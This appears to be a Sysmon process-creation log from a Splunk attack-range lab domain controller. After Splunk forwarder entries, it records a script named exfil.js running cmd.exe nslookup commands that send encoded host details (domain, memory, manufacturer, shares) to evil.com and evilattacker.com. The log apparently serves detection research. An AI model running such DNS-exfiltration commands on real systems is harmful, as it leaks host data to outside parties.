AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069186Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:19.917{A8622C2F-5977-6078-6D0E-00000000AE01}2412C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069176Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:19.235{A8622C2F-5977-6078-6C0E-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069137Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:17.205{A8622C2F-5975-6078-6B0E-00000000AE01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069126Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:16.646{A8622C2F-5974-6078-6A0E-00000000AE01}2412C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069116Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:16.120{A8622C2F-5974-6078-690E-00000000AE01}2828C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069080Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:08.404{A8622C2F-596C-6078-680E-00000000AE01}2344C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-596C-6078-660E-00000000AE01}2424C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltyr.tmp 2>&1 154100x800000000000000069069Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:08.374{A8622C2F-596C-6078-660E-00000000AE01}2424C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltyr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000069037Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:07.618{A8622C2F-596B-6078-650E-00000000AE01}2776C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-596B-6078-630E-00000000AE01}2412C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhpvez.tmp 2>&1 154100x800000000000000069026Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:07.589{A8622C2F-596B-6078-630E-00000000AE01}2412C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhpvez.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068994Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:06.813{A8622C2F-596A-6078-620E-00000000AE01}564C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-596A-6078-600E-00000000AE01}932C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlykslr.tmp 2>&1 154100x800000000000000068982Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:06.784{A8622C2F-596A-6078-600E-00000000AE01}932C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlykslr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068952Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:05.821{A8622C2F-5969-6078-5F0E-00000000AE01}6160C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5969-6078-5D0E-00000000AE01}5444C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlctw.tmp 2>&1 154100x800000000000000068941Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:05.791{A8622C2F-5969-6078-5D0E-00000000AE01}5444C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlctw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068927Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:05.134{A8622C2F-5969-6078-5C0E-00000000AE01}4476C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5969-6078-5A0E-00000000AE01}928C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlohvcvk.tmp 2>&1 154100x800000000000000068916Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:05.105{A8622C2F-5969-6078-5A0E-00000000AE01}928C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlohvcvk.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000068853Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:52.696{A8622C2F-595C-6078-590E-00000000AE01}3176C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-595C-6078-570E-00000000AE01}3368C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhdtg.tmp 2>&1 154100x800000000000000068841Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:52.667{A8622C2F-595C-6078-570E-00000000AE01}3368C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhdtg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068816Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:48.606{A8622C2F-5958-6078-560E-00000000AE01}3500C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5958-6078-540E-00000000AE01}6240C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfgsx.tmp 2>&1 154100x800000000000000068805Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:48.576{A8622C2F-5958-6078-540E-00000000AE01}6240C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfgsx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068704Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:35.061{A8622C2F-594B-6078-530E-00000000AE01}6076C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-594B-6078-510E-00000000AE01}5748C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyaf.tmp 2>&1 154100x800000000000000068693Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:35.032{A8622C2F-594B-6078-510E-00000000AE01}5748C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyaf.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000068665Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:30.536{A8622C2F-5946-6078-500E-00000000AE01}4476C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5946-6078-4E0E-00000000AE01}1140C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqnf.tmp 2>&1 154100x800000000000000068654Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:30.507{A8622C2F-5946-6078-4E0E-00000000AE01}1140C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqnf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068588Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:22.627{A8622C2F-593E-6078-4D0E-00000000AE01}4164C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-593E-6078-4B0E-00000000AE01}5412C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkqdsmq.tmp 2>&1 154100x800000000000000068576Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:22.598{A8622C2F-593E-6078-4B0E-00000000AE01}5412C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkqdsmq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068567Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:22.582{A8622C2F-593E-6078-4A0E-00000000AE01}5116C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-593E-6078-480E-00000000AE01}6416C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllemx.tmp 2>&1 154100x800000000000000068556Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:22.553{A8622C2F-593E-6078-480E-00000000AE01}6416C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllemx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068547Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:22.538{A8622C2F-593E-6078-470E-00000000AE01}5864C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-593E-6078-450E-00000000AE01}6128C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsga.tmp 2>&1 154100x800000000000000068536Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:22.510{A8622C2F-593E-6078-450E-00000000AE01}6128C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsga.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068527Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:22.494{A8622C2F-593E-6078-440E-00000000AE01}3684C:\Windows\System32\nslookup.exe10.0.14393.0 